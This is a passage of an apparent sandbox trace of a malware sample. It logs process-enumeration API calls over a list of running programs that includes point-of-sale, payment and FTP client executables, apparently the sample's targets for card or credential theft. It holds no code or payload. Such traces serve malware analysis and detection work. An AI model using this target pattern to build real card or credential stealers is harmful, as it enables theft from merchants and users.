cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0224.063] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0224.067] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0224.070] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0224.075] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0224.077] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0224.080] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0224.082] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0224.084] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0224.089] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0224.092] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0224.094] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0224.096] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0224.098] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0224.101] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0224.103] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0224.105] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0224.108] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.110] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.112] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0224.114] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.117] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0224.119] CloseHandle (hObject=0x1950) returned 1 [0224.119] Sleep (dwMilliseconds=0x64) [0224.239] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21ac [0224.261] Process32First (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.264] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.266] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.268] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.273] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.275] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.277] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.280] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.321] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.323] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.325] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.327] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.329] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.331] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.333] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.335] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.337] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.339] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.340] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.343] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.345] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0224.347] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.348] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0224.350] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.352] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0224.354] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0224.423] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0224.426] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0224.429] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.431] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0224.434] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.437] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.439] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0224.442] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.444] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.447] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.450] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.452] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0224.454] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0224.457] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0224.466] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0224.468] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0224.472] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0224.474] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0224.477] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0224.480] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0224.482] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0224.484] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0224.487] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0224.490] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0224.492] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0224.495] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0224.499] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0224.506] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0224.508] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0224.511] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0224.513] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0224.516] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0224.519] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0224.523] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0224.526] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0224.529] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0224.532] Process32Next (in: hSnapshot=0x21ac, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 